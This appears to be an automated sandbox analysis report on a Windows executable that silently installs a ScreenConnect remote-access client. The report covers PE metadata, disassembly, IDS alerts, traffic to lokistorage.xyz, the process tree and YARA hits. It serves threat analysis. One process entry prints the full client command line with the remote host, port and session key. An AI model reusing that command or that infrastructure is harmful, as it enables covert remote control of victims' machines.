                                                                Icon Hash:00928e8e8686b000
                                                                Entrypoint:0x4014ad
                                                                Entrypoint Section:.text
                                                                Digitally signed:true
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:5
                                                                OS Version Minor:1
                                                                File Version Major:5
                                                                File Version Minor:1
                                                                Subsystem Version Major:5
                                                                Subsystem Version Minor:1
                                                                Import Hash:9771ee6344923fa220489ab01239bdfd
                                                                Signature Valid:true
                                                                Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                Signature Validation Error:The operation completed successfully
                                                                Error Number:0
                                                                Not Before, Not After
                                                                • 17/08/2022 02:00:00 16/08/2025 01:59:59
                                                                Subject Chain
                                                                • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                Version:3
                                                                Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                Serial:0B9360051BCCF66642998998D5BA97CE
                                                                Instruction
                                                                call 00007FEE44F2F44Ah
                                                                jmp 00007FEE44F2EEFFh
                                                                push ebp
                                                                mov ebp, esp
                                                                push 00000000h
                                                                call dword ptr [0040D040h]
                                                                push dword ptr [ebp+08h]
                                                                call dword ptr [0040D03Ch]
                                                                push C0000409h
                                                                call dword ptr [0040D044h]
                                                                push eax
                                                                call dword ptr [0040D048h]
                                                                pop ebp
                                                                ret
                                                                push ebp
                                                                mov ebp, esp
                                                                sub esp, 00000324h
                                                                push 00000017h
                                                                call dword ptr [0040D04Ch]
                                                                test eax, eax
                                                                je 00007FEE44F2F087h
                                                                push 00000002h
                                                                pop ecx
                                                                int 29h
                                                                mov dword ptr [004148D8h], eax
                                                                mov dword ptr [004148D4h], ecx
                                                                mov dword ptr [004148D0h], edx
                                                                mov dword ptr [004148CCh], ebx
                                                                mov dword ptr [004148C8h], esi
                                                                mov dword ptr [004148C4h], edi
                                                                mov word ptr [004148F0h], ss
                                                                mov word ptr [004148E4h], cs
                                                                mov word ptr [004148C0h], ds
                                                                mov word ptr [004148BCh], es
                                                                mov word ptr [004148B8h], fs
                                                                mov word ptr [004148B4h], gs
                                                                pushfd
                                                                pop dword ptr [004148E8h]
                                                                mov eax, dword ptr [ebp+00h]
                                                                mov dword ptr [004148DCh], eax
                                                                mov eax, dword ptr [ebp+04h]
                                                                mov dword ptr [004148E0h], eax
                                                                lea eax, dword ptr [ebp+08h]
                                                                mov dword ptr [004148ECh], eax
                                                                mov eax, dword ptr [ebp-00000324h]
                                                                mov dword ptr [00414828h], 00010001h
                                                                Programming Language:
                                                                • [IMP] VS2008 SP1 build 30729
                                                                • [IMP] VS2008 build 21022
                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x129c40x50.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x53747c.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x54a6000x3fda0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x54e0000xea8.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x11f200x70.rdata
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x11e600x40.rdata
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0xd0000x13c.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000xb1af0xb200d9fa6da0baf4b869720be833223490cbFalse0.6123156601123596data6.592039633797327IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0xd0000x60780x62008b45a1035c0de72f910a75db7749f735False0.41549744897959184data4.786621464556291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0x140000x11e40x8001f4cc86b6735a74429c9d1feb93e2871False0.18310546875data2.265083745848167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0x160000x53747c0x5376009031d2d9e81b0f6feb6373861cf5cdaaunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x54e0000xea80x1000a93b0f39998e1e69e5944da8c5ff06b1False0.72265625data6.301490309336801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                FILES0x163d40x85600PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.3967589473992502
                                                                FILES0x9b9d40x1a4400PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.5110044479370117
                                                                FILES0x23fdd40x1ac00PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.44113244742990654
                                                                FILES0x25a9d40x2f1320PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.9811086654663086
                                                                FILES0x54bcf40x1600PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.3908025568181818
                                                                RT_MANIFEST0x54d2f40x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                                                                DLLImport
                                                                mscoree.dllCorBindToRuntimeEx
                                                                KERNEL32.dllGetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
                                                                OLEAUT32.dllVariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData
                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishUnited States
                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-11-12T18:40:36.308292+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.849708TCP
                                                                2024-11-12T18:41:04.675325+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.863743TCP
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Nov 12, 2024 18:40:25.941838980 CET497078041192.168.2.895.164.16.15
                                                                Nov 12, 2024 18:40:25.946747065 CET80414970795.164.16.15192.168.2.8
                                                                Nov 12, 2024 18:40:25.946842909 CET497078041192.168.2.895.164.16.15
                                                                Nov 12, 2024 18:40:26.530371904 CET497078041192.168.2.895.164.16.15
                                                                Nov 12, 2024 18:40:26.535248995 CET80414970795.164.16.15192.168.2.8
                                                                Nov 12, 2024 18:40:26.807744026 CET80414970795.164.16.15192.168.2.8
                                                                Nov 12, 2024 18:40:26.843333006 CET497078041192.168.2.895.164.16.15
                                                                Nov 12, 2024 18:40:26.848326921 CET80414970795.164.16.15192.168.2.8
                                                                Nov 12, 2024 18:40:27.124286890 CET80414970795.164.16.15192.168.2.8
                                                                Nov 12, 2024 18:40:27.124778986 CET80414970795.164.16.15192.168.2.8
                                                                Nov 12, 2024 18:40:27.124878883 CET497078041192.168.2.895.164.16.15
                                                                Nov 12, 2024 18:40:29.194511890 CET497078041192.168.2.895.164.16.15
                                                                Nov 12, 2024 18:40:29.194679976 CET497078041192.168.2.895.164.16.15
                                                                Nov 12, 2024 18:40:29.199500084 CET80414970795.164.16.15192.168.2.8
                                                                Nov 12, 2024 18:40:29.199516058 CET80414970795.164.16.15192.168.2.8
                                                                Nov 12, 2024 18:40:29.199537992 CET80414970795.164.16.15192.168.2.8
                                                                Nov 12, 2024 18:40:29.199548006 CET80414970795.164.16.15192.168.2.8
                                                                Nov 12, 2024 18:40:29.199569941 CET80414970795.164.16.15192.168.2.8
                                                                Nov 12, 2024 18:41:29.209702015 CET497078041192.168.2.895.164.16.15
                                                                Nov 12, 2024 18:41:29.214835882 CET80414970795.164.16.15192.168.2.8
                                                                Nov 12, 2024 18:42:29.225667953 CET497078041192.168.2.895.164.16.15
                                                                Nov 12, 2024 18:42:29.231748104 CET80414970795.164.16.15192.168.2.8
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Nov 12, 2024 18:40:25.833100080 CET6130053192.168.2.81.1.1.1
                                                                Nov 12, 2024 18:40:25.877652884 CET53613001.1.1.1192.168.2.8
                                                                Nov 12, 2024 18:41:02.498578072 CET5357664162.159.36.2192.168.2.8
                                                                Nov 12, 2024 18:41:03.133719921 CET53548561.1.1.1192.168.2.8
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Nov 12, 2024 18:40:25.833100080 CET192.168.2.81.1.1.10xbd43Standard query (0)lokistorage.xyzA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Nov 12, 2024 18:40:25.877652884 CET1.1.1.1192.168.2.80xbd43No error (0)lokistorage.xyz95.164.16.15A (IP address)IN (0x0001)false

                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:12:40:16
                                                                Start date:12/11/2024
                                                                Path:C:\Users\user\Desktop\H36NgltNe7.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\H36NgltNe7.exe"
                                                                Imagebase:0x660000
                                                                File size:5'809'056 bytes
                                                                MD5 hash:06AD0256587C76C2C405663AEBEE2A46
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1493878183.00000000052E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000000.1464550811.0000000000676000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1486363645.0000000002981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:12:40:18
                                                                Start date:12/11/2024
                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"
                                                                Imagebase:0x120000
                                                                File size:59'904 bytes
                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:3
                                                                Start time:12:40:19
                                                                Start date:12/11/2024
                                                                Path:C:\Windows\System32\msiexec.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\msiexec.exe /V
                                                                Imagebase:0x7ff6ffa20000
                                                                File size:69'632 bytes
                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:4
                                                                Start time:12:40:20
                                                                Start date:12/11/2024
                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 10C72F14AAC88ABBC0F40DDD9214C022 C
                                                                Imagebase:0x120000
                                                                File size:59'904 bytes
                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:5
                                                                Start time:12:40:20
                                                                Start date:12/11/2024
                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7294250 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                Imagebase:0xc80000
                                                                File size:61'440 bytes
                                                                MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:6
                                                                Start time:12:40:22
                                                                Start date:12/11/2024
                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 03D5F726DB338ACF6E810EBD73840770
                                                                Imagebase:0x120000
                                                                File size:59'904 bytes
                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:7
                                                                Start time:12:40:23
                                                                Start date:12/11/2024
                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding FE76E3AF69419F4753BCF881322892BA E Global\MSI0000
                                                                Imagebase:0x120000
                                                                File size:59'904 bytes
                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:8
                                                                Start time:12:40:23
                                                                Start date:12/11/2024
                                                                Path:C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=lokistorage.xyz&p=8041&s=3a500b51-1436-4bf3-8200-68822bcae42d&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=Patrycja%20Bochenek&c=PL&c=Dariusz&c=&c=&c=&c=&c=&c="
                                                                Imagebase:0x880000
                                                                File size:95'520 bytes
                                                                MD5 hash:826314610D9E854477B08666330940B5
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 0%, ReversingLabs
                                                                Reputation:moderate
                                                                Has exited:false

                                                                Target ID:9
                                                                Start time:12:40:25
                                                                Start date:12/11/2024
                                                                Path:C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "9bc287e7-1c02-4a4b-bd79-9db7a3015930" "User"
                                                                Imagebase:0x790000
                                                                File size:598'816 bytes
                                                                MD5 hash:AB5FA8D90645878D587F386D0E276C02
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.2730222529.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000000.1546068019.0000000000792000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 0%, ReversingLabs
                                                                Reputation:moderate
                                                                Has exited:false

                                                                Target ID:10
                                                                Start time:12:40:27
                                                                Start date:12/11/2024
                                                                Path:C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "59802056-0e86-4f92-b003-56a2c2f706f5" "System"
                                                                Imagebase:0x9d0000
                                                                File size:598'816 bytes
                                                                MD5 hash:AB5FA8D90645878D587F386D0E276C02
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.1598063638.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Reset < >
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1486137893.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_fd0000_H36NgltNe7.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 38$k/$7
                                                                  • API String ID: 0-2417570947
                                                                  • Opcode ID: e4c786dc317aa7cf44e5665e6f5c26d88db336c8bb990ce8256d15f48f2926dd
                                                                  • Instruction ID: 4f95aff509f6d91024ff7f55ac4d60d3ed2d88c8f8e4699d93ad6f41cd94c2a1
                                                                  • Opcode Fuzzy Hash: e4c786dc317aa7cf44e5665e6f5c26d88db336c8bb990ce8256d15f48f2926dd
                                                                  • Instruction Fuzzy Hash: E0617F317143124BC701BB2DE89565EBBA7EFC9B61354822AE815CB388EF70ED4587A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1486137893.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_fd0000_H36NgltNe7.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: {Y
                                                                  • API String ID: 0-978181617
                                                                  • Opcode ID: 3633e8181c67bd6f0531aa2b48f76dc738a5447eb9684d59c654edc35f12b7dd
                                                                  • Instruction ID: 931bbce8f0e015c9254835e5388a986b2090e6aed0ede752faaa6b91ebec4c57
                                                                  • Opcode Fuzzy Hash: 3633e8181c67bd6f0531aa2b48f76dc738a5447eb9684d59c654edc35f12b7dd
                                                                  • Instruction Fuzzy Hash: 9F412D76A013415FDB55DB78C88118DBBB2EF927A0B08809BD589CF392EB30DC0687E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1486137893.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_fd0000_H36NgltNe7.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1825b4f254ac6ab30f275ac03d11e6f90444d3a1b89abaeb5905501edafe5a7f
                                                                  • Instruction ID: 5ede7a56674f493c81490500947dcfeb5f8eccbf63c3d879f329e7c4bb750531
                                                                  • Opcode Fuzzy Hash: 1825b4f254ac6ab30f275ac03d11e6f90444d3a1b89abaeb5905501edafe5a7f
                                                                  • Instruction Fuzzy Hash: 65D1F435A0120ADFCF05CF98C9809AEBBB6FF89314B24845AE955E7321D731ED16DB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1486137893.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_fd0000_H36NgltNe7.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 59b502acba01914e6e29ca69dd375469805435f8b8a6dc694f53e33307214646
                                                                  • Instruction ID: d65a51ec0a4a2e299bb7fe5735d14954902376c271d116857930027469a2aca8
                                                                  • Opcode Fuzzy Hash: 59b502acba01914e6e29ca69dd375469805435f8b8a6dc694f53e33307214646
                                                                  • Instruction Fuzzy Hash: D0912A34B002059FDB05DF68D895A6EBBF2EF88701B14852AE81ADB395DB70EC02DB51
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1486137893.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_fd0000_H36NgltNe7.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a437edd9ab6094908ff70e85a57dbc390c015f894974418c21251a3af96fcbae
                                                                  • Instruction ID: 5561ab23c7c35bb30ab2fc2405d54bfd83e20448a8e184bf45aab259d8108941
                                                                  • Opcode Fuzzy Hash: a437edd9ab6094908ff70e85a57dbc390c015f894974418c21251a3af96fcbae
                                                                  • Instruction Fuzzy Hash: EB913C31A003158BDB15DF69D44469EBBF2FF85721B18862AE815DF389DB70AD06CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1486137893.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_fd0000_H36NgltNe7.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8bc94a12277242418672831958f31fad7223b56a4597ba855c15cb2b197659d8
                                                                  • Instruction ID: 5771ff4e4f6f228c13ae1cf0f658d197058477ebdc6c83dd5030a1016405a847
                                                                  • Opcode Fuzzy Hash: 8bc94a12277242418672831958f31fad7223b56a4597ba855c15cb2b197659d8
                                                                  • Instruction Fuzzy Hash: C7812A34B002059FCB15EF68D894A6EBBF2FF88711B14852AE81ADB395DB70EC01DB51
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1486137893.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_fd0000_H36NgltNe7.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f4f73fadb391261524a4b29cf2466a41984edd362f48401cb6df8947a9332a9c
                                                                  • Instruction ID: 0590af7a27fda813d3545fb05574d47d14b164cd7c4249d85c2ef2ca5071c12d
                                                                  • Opcode Fuzzy Hash: f4f73fadb391261524a4b29cf2466a41984edd362f48401cb6df8947a9332a9c
                                                                  • Instruction Fuzzy Hash: 08619E75B106058FCB45DF68D8855ADBBF3EFC9320729856AE40AEB391DB70AC058B60
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1486137893.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_fd0000_H36NgltNe7.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 178f3ea6a3d71f0e450dc0bc1eae80984d9edd374c84ca6064e6da719c3e042b
                                                                  • Instruction ID: d9cc27763e985f7e8a6b1ad9485f10fb6bb14533fd52badf16ee0bea9b388dfc
                                                                  • Opcode Fuzzy Hash: 178f3ea6a3d71f0e450dc0bc1eae80984d9edd374c84ca6064e6da719c3e042b
                                                                  • Instruction Fuzzy Hash: A2612734B102059FDB14DFA8D894A6EB7B2FF8D754B148159E906EB364DB30EC02EB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1486137893.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_fd0000_H36NgltNe7.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 705ca951f584955984938ff94687eebcbe58d848dd730aee36b044595c56d026
                                                                  • Instruction ID: 80d55b9d670a2f5a6aca5a30060257e03759f070f383e3df4c5efebb87378ef8
                                                                  • Opcode Fuzzy Hash: 705ca951f584955984938ff94687eebcbe58d848dd730aee36b044595c56d026
                                                                  • Instruction Fuzzy Hash: 9A613034B10A008FCB44DF69C88499ABBF2FF89B1571185A9E51ADB731EB30EC05CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1486137893.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_fd0000_H36NgltNe7.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 31aaed60feca3f737f9e56105cadc5c4486259553da7f54d827d1cea88f29b36
                                                                  • Instruction ID: 6bbdf549673ae1ce33c141abb9a469a356db20f60d4a4cccbf1be7b75e0fe32b
                                                                  • Opcode Fuzzy Hash: 31aaed60feca3f737f9e56105cadc5c4486259553da7f54d827d1cea88f29b36
                                                                  • Instruction Fuzzy Hash: 0B514A75A10619CFCB04CFA9C88499EB7F6FF8A700B21816AE505EF361DBB1AD05CB50
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1486137893.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_fd0000_H36NgltNe7.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2d281f4ebc35aeab29754bc117d5d00599709b87051752284629a8dc085ce3dd
                                                                  • Instruction ID: 11fbe509109a6ac250010cdba9563462cdebe9671dad2aeb3afceabff3629a40
                                                                  • Opcode Fuzzy Hash: 2d281f4ebc35aeab29754bc117d5d00599709b87051752284629a8dc085ce3dd
                                                                  • Instruction Fuzzy Hash: 93611038710A048FC754DF29C88895ABBF2FF88A1175185A9E90ADB771EB30EC04CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1486137893.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
